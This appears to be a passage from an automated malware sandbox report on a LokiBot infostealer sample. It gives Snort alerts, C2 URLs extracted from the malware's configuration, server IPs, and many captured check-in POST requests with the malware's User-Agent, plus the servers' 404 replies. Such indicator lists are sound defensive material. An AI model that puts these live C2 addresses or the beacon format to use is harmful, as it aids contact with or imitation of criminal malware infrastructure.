Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49938 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49938 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49938 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49939 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49939 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49939 -> 172.67.219.104:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49939 -> 172.67.219.104:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	IP Address: 172.67.219.104 172.67.219.104
Source: Joe Sandbox View	IP Address: 104.21.62.32 104.21.62.32

Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 196Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close
Source: global traffic	HTTP traffic detected: POST /BN111/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 74f26d34ffff049368a6cff8812f86ee.gqAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: F4173EBCContent-Length: 169Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:19 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tc%2BH09Yr5HaypHMlBF4iUDG3nhys2pPE4zSX4LGjecWNJzGpM%2B99gDFRrUNEMRf3eoe2rHO1C%2BujLeyZYYPL6AvWl4cI4PR4ssIE72e%2BnJtPmjJiBKaVLXSCw8d0%2BL7Ql8nO18QK89ttl7gsAcZIK9ns5%2B1G5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf331c2f691f-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:20 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hQkFe3UJ1QmCzUsZUQlHGGa3jv5VhF59kyHL%2FAsWX3Cle1Hp0JGwG2RiPxylz6fXh7eYHqVnm1Viov8%2Fg8G0zh1TwiCsMn%2BxPOnxpZErkhdqFG1ph3AcJYoYgnYYS96tyPBQDWnFXqoyO4YpwFfZSNVBuZc%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf3b3ba57057-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:21 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gywdBNFWVFKIiZY3FEiKOzs84VMPVYr0KsnkFxu9YBLF66h9wh5gFt%2BKvxTgQoptbBobPo4zo%2FqKzOkAcdBuhuoMMrcjb2wrOtLU4%2BScQPJGN05F5R8f5lBn8MTmqMmHsvXJe26qCeRgvef6Z2NcGbvmdK2vnQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf4179ac16e6-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Oct 2021 06:28:22 GMTContent-Type: text/html; charset=UTF-8Connection: closevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rIV1TCFtSps327NCu2VLT4v29yYPaf8k0h8mWGTLoJdR4ctIDPvXYKYGHAiiR70AaLpuz4o3vkmUXm72wLswxeU23M%2BVnkrC6oouZxiAyBfAU%2B7srHMGXyKvERWjs%2FICV8ZBHL3aKPib3xMytSdkecNOp%2BGqKQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 69debf493e674e9d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
